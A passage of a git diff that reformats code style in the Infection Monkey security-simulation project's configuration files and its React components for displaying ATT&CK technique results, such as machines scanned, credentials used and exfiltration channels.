'entities_list': 1}) if entity_details.get('type') == GROUPTYPE: self.add_admin(entity_details, machine_id) - diff --git a/monkey/monkey_island/cc/ui/.babelrc b/monkey/monkey_island/cc/ui/.babelrc index 31130e826..7c92bc8e1 100644 --- a/monkey/monkey_island/cc/ui/.babelrc +++ b/monkey/monkey_island/cc/ui/.babelrc @@ -1,4 +1,10 @@ { - "presets": ["es2015", "stage-0", "react"], - "plugins": ["emotion"] + "presets": [ + "es2015", + "stage-0", + "react" + ], + "plugins": [ + "emotion" + ] } diff --git a/monkey/monkey_island/cc/ui/.eslintrc b/monkey/monkey_island/cc/ui/.eslintrc index b542daaf7..6b5cd85f9 100644 --- a/monkey/monkey_island/cc/ui/.eslintrc +++ b/monkey/monkey_island/cc/ui/.eslintrc @@ -19,14 +19,22 @@ }, "rules": { "comma-dangle": 1, - "quotes": [ 1, "single" ], + "quotes": [ + 1, + "single" + ], "no-undef": 1, "global-strict": 0, "no-extra-semi": 1, "no-underscore-dangle": 0, "no-console": 1, "no-unused-vars": 1, - "no-trailing-spaces": [1, { "skipBlankLines": true }], + "no-trailing-spaces": [ + 1, + { + "skipBlankLines": true + } + ], "no-unreachable": 1, "no-alert": 0, "react/jsx-uses-react": 1, diff --git a/monkey/monkey_island/cc/ui/karma.conf.js b/monkey/monkey_island/cc/ui/karma.conf.js index 87401bfe6..660cb8128 100644 --- a/monkey/monkey_island/cc/ui/karma.conf.js +++ b/monkey/monkey_island/cc/ui/karma.conf.js @@ -3,23 +3,23 @@ var webpackCfg = require('./webpack.config'); // Set node environment to testing process.env.NODE_ENV = 'test'; -module.exports = function(config) { +module.exports = function (config) { config.set({ basePath: '', - browsers: [ 'PhantomJS' ], + browsers: ['PhantomJS'], files: [ 'test/loadtests.js' ], port: 8000, captureTimeout: 60000, - frameworks: [ 'mocha', 'chai' ], + frameworks: ['mocha', 'chai'], client: { mocha: {} }, singleRun: true, - reporters: [ 'mocha', 'coverage' ], + reporters: ['mocha', 'coverage'], preprocessors: { - 'test/loadtests.js': [ 'webpack', 'sourcemap' ] + 'test/loadtests.js': ['webpack', 'sourcemap'] }, webpack: webpackCfg, webpackServer: { @@ -28,8 +28,8 @@ module.exports = function(config) { coverageReporter: { dir: 'coverage/', reporters: [ - { type: 'html' }, - { type: 'text' } + {type: 'html'}, + {type: 'text'} ] } }); diff --git a/monkey/monkey_island/cc/ui/server.js b/monkey/monkey_island/cc/ui/server.js index ec9182cde..49045359e 100644 --- a/monkey/monkey_island/cc/ui/server.js +++ b/monkey/monkey_island/cc/ui/server.js @@ -14,19 +14,19 @@ let isInitialCompilation = true; const compiler = webpack(config); new WebpackDevServer(compiler, config.devServer) -.listen(config.port, 'localhost', (err) => { - if (err) { - console.log(err); - } - console.log('Listening at localhost:' + config.port); -}); + .listen(config.port, 'localhost', (err) => { + if (err) { + console.log(err); + } + console.log('Listening at localhost:' + config.port); + }); compiler.plugin('done', () => { if (isInitialCompilation) { // Ensures that we log after webpack printed its stats (is there a better way?) setTimeout(() => { console.log('\n✓ The bundle is now ready for serving!\n'); - console.log(' Open in iframe mode:\t\x1b[33m%s\x1b[0m', 'http://localhost:' + config.port + '/webpack-dev-server/'); + console.log(' Open in iframe mode:\t\x1b[33m%s\x1b[0m', 'http://localhost:' + config.port + '/webpack-dev-server/'); console.log(' Open in inline mode:\t\x1b[33m%s\x1b[0m', 'http://localhost:' + config.port + '/\n'); console.log(' \x1b[33mHMR is active\x1b[0m. The bundle will automatically rebuild and live-update on changes.') }, 350); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/MatrixComponent.js b/monkey/monkey_island/cc/ui/src/components/attack/MatrixComponent.js index 2e7ef4fc3..640032767 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/MatrixComponent.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/MatrixComponent.js @@ -14,10 +14,10 @@ class MatrixComponent extends AuthComponent { }; // Finds which attack type has most techniques and returns that number - static findMaxTechniques(data){ + static findMaxTechniques(data) { let maxLen = 0; - data.forEach(function(techType) { - if (Object.keys(techType.properties).length > maxLen){ + data.forEach(function (techType) { + if (Object.keys(techType.properties).length > maxLen) { maxLen = Object.keys(techType.properties).length } }); @@ -25,18 +25,18 @@ class MatrixComponent extends AuthComponent { }; // Parses ATT&CK config schema into data suitable for react-table (ATT&CK matrix) - static parseTechniques (data, maxLen) { + static parseTechniques(data, maxLen) { let techniques = []; // Create rows with attack techniques for (let i = 0; i < maxLen; i++) { let row = {}; - data.forEach(function(techType){ + data.forEach(function (techType) { let rowColumn = {}; rowColumn.techName = techType.title; if (i <= Object.keys(techType.properties).length) { rowColumn.technique = Object.values(techType.properties)[i]; - if (rowColumn.technique){ + if (rowColumn.technique) { rowColumn.technique.name = Object.keys(techType.properties)[i] } } else { @@ -50,28 +50,28 @@ class MatrixComponent extends AuthComponent { }; getColumns(matrixData) { - return Object.keys(matrixData[0]).map((key)=>{ + return Object.keys(matrixData[0]).map((key) => { return { Header: key, id: key, accessor: x => this.renderTechnique(x[key].technique), - style: { 'whiteSpace': 'unset' } + style: {'whiteSpace': 'unset'} }; }); } renderTechnique(technique) { - if (technique == null){ - return (
) + if (technique == null) { + return (
) } else { return ( - - {technique.title} - - ) + + {technique.title} + + ) } }; @@ -85,20 +85,20 @@ class MatrixComponent extends AuthComponent { renderLegend = () => { return ( - ) + ) }; render() { @@ -110,7 +110,7 @@ class MatrixComponent extends AuthComponent { + defaultPageSize={tableData['maxTechniques']}/>
); } diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js index 4d4f55dad..7b7215db0 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js @@ -1,57 +1,62 @@ import React from "react"; -export function renderMachine(val){ - return ( - {val.ip_addr} {(val.domain_name ? " (".concat(val.domain_name, ")") : "")} - ) +export function renderMachine(val) { + return ( + {val.ip_addr} {(val.domain_name ? " (".concat(val.domain_name, ")") : "")} + ) } /* Function takes data gathered from system info collector and creates a string representation of machine from that data. */ export function renderMachineFromSystemData(data) { - let machineStr = data['hostname'] + " ( "; - data['ips'].forEach(function(ipInfo){ - if(typeof ipInfo === "object"){ - machineStr += ipInfo['addr'] + ", "; - } else { - machineStr += ipInfo + ", "; - } - }); - // Replaces " ," with " )" to finish a list of IP's - return machineStr.slice(0, -2) + " )" + let machineStr = data['hostname'] + " ( "; + data['ips'].forEach(function (ipInfo) { + if (typeof ipInfo === "object") { + machineStr += ipInfo['addr'] + ", "; + } else { + machineStr += ipInfo + ", "; + } + }); + // Replaces " ," with " )" to finish a list of IP's + return machineStr.slice(0, -2) + " )" } /* Formats telemetry data that contains _id.machine and _id.usage fields into columns for react table. */ export function getUsageColumns() { - return ([{ - columns: [ - {Header: 'Machine', - id: 'machine', - accessor: x => renderMachineFromSystemData(x.machine), - style: { 'whiteSpace': 'unset' }, - width: 300}, - {Header: 'Usage', - id: 'usage', - accessor: x => x.usage, - style: { 'whiteSpace': 'unset' }}] - }])} + return ([{ + columns: [ + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'}, + width: 300 + }, + { + Header: 'Usage', + id: 'usage', + accessor: x => x.usage, + style: {'whiteSpace': 'unset'} + }] + }]) +} /* Renders table fields that contains 'used' boolean value and 'name' string value. 'Used' value determines if 'name' value will be shown. */ -export function renderUsageFields(usages){ - let output = []; - usages.forEach(function(usage){ - if(usage['used']){ - output.push(
{usage['name']}
) - } - }); - return (
{output}
); - } +export function renderUsageFields(usages) { + let output = []; + usages.forEach(function (usage) { + if (usage['used']) { + output.push(
{usage['name']}
) + } + }); + return (
{output}
); +} export const ScanStatus = { - UNSCANNED: 0, - SCANNED: 1, - USED: 2 + UNSCANNED: 0, + SCANNED: 1, + USED: 2 }; diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1003.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1003.js index 24d742c14..ccebd3e7c 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1003.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1003.js @@ -17,7 +17,8 @@ class T1003 extends React.Component {
{this.props.data.message}

{this.props.data.status === ScanStatus.USED ? - + : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1005.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1005.js index 6d46c2285..799b91d08 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1005.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1005.js @@ -13,10 +13,17 @@ class T1005 extends React.Component { return ([{ Header: "Sensitive data", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Type', id: 'type', accessor: x => x.gathered_data_type, style: { 'whiteSpace': 'unset' }}, - {Header: 'Info', id: 'info', accessor: x => x.info, style: { 'whiteSpace': 'unset' }}, - ]}])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'} + }, + {Header: 'Type', id: 'type', accessor: x => x.gathered_data_type, style: {'whiteSpace': 'unset'}}, + {Header: 'Info', id: 'info', accessor: x => x.info, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -25,10 +32,10 @@ class T1005 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1016.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1016.js index 63e2bb4a5..c5a02a8f7 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1016.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1016.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, renderUsageFields, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, renderUsageFields, ScanStatus} from "./Helpers" class T1016 extends React.Component { @@ -14,10 +14,16 @@ class T1016 extends React.Component { return ([{ Header: "Network configuration info gathered", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Network info', id: 'info', accessor: x => renderUsageFields(x.info), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'} + }, + {Header: 'Network info', id: 'info', accessor: x => renderUsageFields(x.info), style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -26,10 +32,10 @@ class T1016 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1018.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1018.js index dcf7687db..e54f4c89c 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1018.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1018.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, renderMachine, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, renderMachine, ScanStatus} from "./Helpers" class T1018 extends React.Component { @@ -10,9 +10,9 @@ class T1018 extends React.Component { super(props); } - static renderMachines(machines){ + static renderMachines(machines) { let output = []; - machines.forEach(function(machine){ + machines.forEach(function (machine) { output.push(renderMachine(machine)) }); return (
{output}
); @@ -21,12 +21,23 @@ class T1018 extends React.Component { static getScanInfoColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.monkey), style: { 'whiteSpace': 'unset' }}, - {Header: 'First scan', id: 'started', accessor: x => x.started, style: { 'whiteSpace': 'unset' }}, - {Header: 'Last scan', id: 'finished', accessor: x => x.finished, style: { 'whiteSpace': 'unset' }}, - {Header: 'Systems found', id: 'systems', accessor: x => T1018.renderMachines(x.machines), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.monkey), + style: {'whiteSpace': 'unset'} + }, + {Header: 'First scan', id: 'started', accessor: x => x.started, style: {'whiteSpace': 'unset'}}, + {Header: 'Last scan', id: 'finished', accessor: x => x.finished, style: {'whiteSpace': 'unset'}}, + { + Header: 'Systems found', + id: 'systems', + accessor: x => T1018.renderMachines(x.machines), + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; render() { return ( @@ -35,10 +46,10 @@ class T1018 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1021.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1021.js index ce8688af1..e9b21d7f4 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1021.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1021.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1021 extends React.Component { @@ -13,12 +13,20 @@ class T1021 extends React.Component { static getServiceColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), - style: { 'whiteSpace': 'unset' }, width: 160}, - {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: { 'whiteSpace': 'unset' }, width: 100}, - {Header: 'Valid account used', id: 'credentials', accessor: x => this.renderCreds(x.successful_creds), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), + style: {'whiteSpace': 'unset'}, width: 160 + }, + {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: {'whiteSpace': 'unset'}, width: 100}, + { + Header: 'Valid account used', + id: 'credentials', + accessor: x => this.renderCreds(x.successful_creds), + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; static renderCreds(creds) { return {creds.map(cred =>
{cred}
)} diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1035.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1035.js index 7345ca497..b95b6bb45 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1035.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1035.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { getUsageColumns } from "./Helpers" +import {getUsageColumns} from "./Helpers" class T1035 extends React.Component { @@ -17,10 +17,10 @@ class T1035 extends React.Component {
{this.props.data.services.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1041.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1041.js index 3d6b45d08..9749186fe 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1041.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1041.js @@ -13,9 +13,11 @@ class T1041 extends React.Component { return ([{ Header: "Data exfiltration channels", columns: [ - {Header: 'Source', id: 'src', accessor: x => x.src, style: { 'whiteSpace': 'unset' }}, - {Header: 'Destination', id: 'dst', accessor: x => x.dst, style: { 'whiteSpace': 'unset' }} - ]}])}; + {Header: 'Source', id: 'src', accessor: x => x.src, style: {'whiteSpace': 'unset'}}, + {Header: 'Destination', id: 'dst', accessor: x => x.dst, style: {'whiteSpace': 'unset'}} + ] + }]) + }; render() { return ( @@ -24,10 +26,10 @@ class T1041 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1059.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1059.js index 4651f5c41..ba886b6c7 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1059.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1059.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1059 extends React.Component { @@ -14,11 +14,18 @@ class T1059 extends React.Component { return ([{ Header: 'Example commands used', columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.data.machine), style: { 'whiteSpace': 'unset'}, width: 160 }, - {Header: 'Approx. Time', id: 'time', accessor: x => x.data.info.finished, style: { 'whiteSpace': 'unset' }}, - {Header: 'Command', id: 'command', accessor: x => x.data.info.executed_cmds.cmd, style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachine(x.data.machine), + style: {'whiteSpace': 'unset'}, + width: 160 + }, + {Header: 'Approx. Time', id: 'time', accessor: x => x.data.info.finished, style: {'whiteSpace': 'unset'}}, + {Header: 'Command', id: 'command', accessor: x => x.data.info.executed_cmds.cmd, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -27,10 +34,10 @@ class T1059 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1064.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1064.js index f57abd4b8..27b099f82 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1064.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1064.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { getUsageColumns } from "./Helpers" +import {getUsageColumns} from "./Helpers" class T1064 extends React.Component { @@ -17,10 +17,10 @@ class T1064 extends React.Component {
{this.props.data.scripts.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1075.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1075.js index 3cd12560b..db2bb943a 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1075.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1075.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1075 extends React.Component { @@ -11,10 +11,10 @@ class T1075 extends React.Component { this.props.data.successful_logins.forEach((login) => this.setLoginHashType(login)) } - setLoginHashType(login){ - if(login.attempts[0].ntlm_hash !== ""){ + setLoginHashType(login) { + if (login.attempts[0].ntlm_hash !== "") { login.attempts[0].hashType = 'NTLM'; - } else if(login.attempts[0].lm_hash !== ""){ + } else if (login.attempts[0].lm_hash !== "") { login.attempts[0].hashType = 'LM'; } } @@ -22,12 +22,13 @@ class T1075 extends React.Component { static getHashColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: { 'whiteSpace': 'unset' }}, - {Header: 'Username', id: 'username', accessor: x => x.attempts[0].user, style: { 'whiteSpace': 'unset' }}, - {Header: 'Hash type', id: 'hash', accessor: x => x.attempts[0].hashType, style: { 'whiteSpace': 'unset' }}, - ] - }])}; + {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), style: {'whiteSpace': 'unset'}}, + {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: {'whiteSpace': 'unset'}}, + {Header: 'Username', id: 'username', accessor: x => x.attempts[0].user, style: {'whiteSpace': 'unset'}}, + {Header: 'Hash type', id: 'hash', accessor: x => x.attempts[0].hashType, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -36,10 +37,10 @@ class T1075 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1082.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1082.js index 8570ab1b0..1e04f9da8 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1082.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1082.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, renderUsageFields, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, renderUsageFields, ScanStatus} from "./Helpers" class T1082 extends React.Component { @@ -13,10 +13,16 @@ class T1082 extends React.Component { static getSystemInfoColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Gathered info', id: 'info', accessor: x => renderUsageFields(x.collections), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'} + }, + {Header: 'Gathered info', id: 'info', accessor: x => renderUsageFields(x.collections), style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -25,10 +31,10 @@ class T1082 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1086.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1086.js index db75d8dda..faeff7862 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1086.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1086.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1086 extends React.Component { @@ -14,11 +14,18 @@ class T1086 extends React.Component { return ([{ Header: 'Example Powershell commands used', columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.data[0].machine), style: { 'whiteSpace': 'unset'}, width: 160 }, - {Header: 'Approx. Time', id: 'time', accessor: x => x.data[0].info.finished, style: { 'whiteSpace': 'unset' }}, - {Header: 'Command', id: 'command', accessor: x => x.data[0].info.executed_cmds[0].cmd, style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachine(x.data[0].machine), + style: {'whiteSpace': 'unset'}, + width: 160 + }, + {Header: 'Approx. Time', id: 'time', accessor: x => x.data[0].info.finished, style: {'whiteSpace': 'unset'}}, + {Header: 'Command', id: 'command', accessor: x => x.data[0].info.executed_cmds[0].cmd, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -27,10 +34,10 @@ class T1086 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1090.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1090.js index 934e76694..8aa0de2c2 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1090.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1090.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, ScanStatus} from "./Helpers" class T1090 extends React.Component { @@ -13,10 +13,13 @@ class T1090 extends React.Component { static getProxyColumns() { return ([{ columns: [ - {Header: 'Machines', + { + Header: 'Machines', id: 'machine', accessor: x => renderMachineFromSystemData(x), - style: { 'whiteSpace': 'unset', textAlign: 'center' }}]}]) + style: {'whiteSpace': 'unset', textAlign: 'center'} + }] + }]) }; render() { @@ -26,10 +29,10 @@ class T1090 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js index 8acd48c4b..d1df0e9e6 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { ScanStatus } from "./Helpers" +import {ScanStatus} from "./Helpers" class T1105 extends React.Component { @@ -14,11 +14,12 @@ class T1105 extends React.Component { return ([{ Header: 'Files copied', columns: [ - {Header: 'Src. Machine', id: 'srcMachine', accessor: x => x.src, style: { 'whiteSpace': 'unset'}, width: 170 }, - {Header: 'Dst. Machine', id: 'dstMachine', accessor: x => x.dst, style: { 'whiteSpace': 'unset'}, width: 170}, - {Header: 'Filename', id: 'filename', accessor: x => x.filename, style: { 'whiteSpace': 'unset'}}, - ] - }])}; + {Header: 'Src. Machine', id: 'srcMachine', accessor: x => x.src, style: {'whiteSpace': 'unset'}, width: 170}, + {Header: 'Dst. Machine', id: 'dstMachine', accessor: x => x.dst, style: {'whiteSpace': 'unset'}, width: 170}, + {Header: 'Filename', id: 'filename', accessor: x => x.filename, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -27,10 +28,10 @@ class T1105 extends React.Component {
{this.props.data.status !== ScanStatus.UNSCANNED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1106.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1106.js index a3210b73c..febebb30d 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1106.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1106.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { getUsageColumns } from "./Helpers" +import {getUsageColumns} from "./Helpers" class T1106 extends React.Component { @@ -17,10 +17,10 @@ class T1106 extends React.Component {
{this.props.data.api_uses.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1107.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1107.js index d80dc3f0e..faabf95a2 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1107.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1107.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, ScanStatus} from "./Helpers" class T1107 extends React.Component { @@ -10,8 +10,8 @@ class T1107 extends React.Component { super(props); } - static renderDelete(status){ - if(status === ScanStatus.USED){ + static renderDelete(status) { + if (status === ScanStatus.USED) { return Yes } else { return No @@ -21,11 +21,19 @@ class T1107 extends React.Component { static getDeletedFileColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x._id.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Path', id: 'path', accessor: x => x._id.path, style: { 'whiteSpace': 'unset' }}, - {Header: 'Deleted?', id: 'deleted', accessor: x => this.renderDelete(x._id.status), - style: { 'whiteSpace': 'unset' }, width: 160}] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x._id.machine), + style: {'whiteSpace': 'unset'} + }, + {Header: 'Path', id: 'path', accessor: x => x._id.path, style: {'whiteSpace': 'unset'}}, + { + Header: 'Deleted?', id: 'deleted', accessor: x => this.renderDelete(x._id.status), + style: {'whiteSpace': 'unset'}, width: 160 + }] + }]) + }; render() { return ( @@ -34,10 +42,10 @@ class T1107 extends React.Component {
{this.props.data.deleted_files.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1110.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1110.js index da9682da3..475e79fed 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1110.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1110.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1110 extends React.Component { @@ -13,15 +13,23 @@ class T1110 extends React.Component { static getServiceColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), - style: { 'whiteSpace': 'unset' }, width: 160}, - {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: { 'whiteSpace': 'unset' }, width: 100}, - {Header: 'Started', id: 'started', accessor: x => x.info.started, style: { 'whiteSpace': 'unset' }}, - {Header: 'Finished', id: 'finished', accessor: x => x.info.finished, style: { 'whiteSpace': 'unset' }}, - {Header: 'Attempts', id: 'attempts', accessor: x => x.attempt_cnt, style: { 'whiteSpace': 'unset' }, width: 160}, - {Header: 'Successful credentials', id: 'credentials', accessor: x => this.renderCreds(x.successful_creds), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), + style: {'whiteSpace': 'unset'}, width: 160 + }, + {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: {'whiteSpace': 'unset'}, width: 100}, + {Header: 'Started', id: 'started', accessor: x => x.info.started, style: {'whiteSpace': 'unset'}}, + {Header: 'Finished', id: 'finished', accessor: x => x.info.finished, style: {'whiteSpace': 'unset'}}, + {Header: 'Attempts', id: 'attempts', accessor: x => 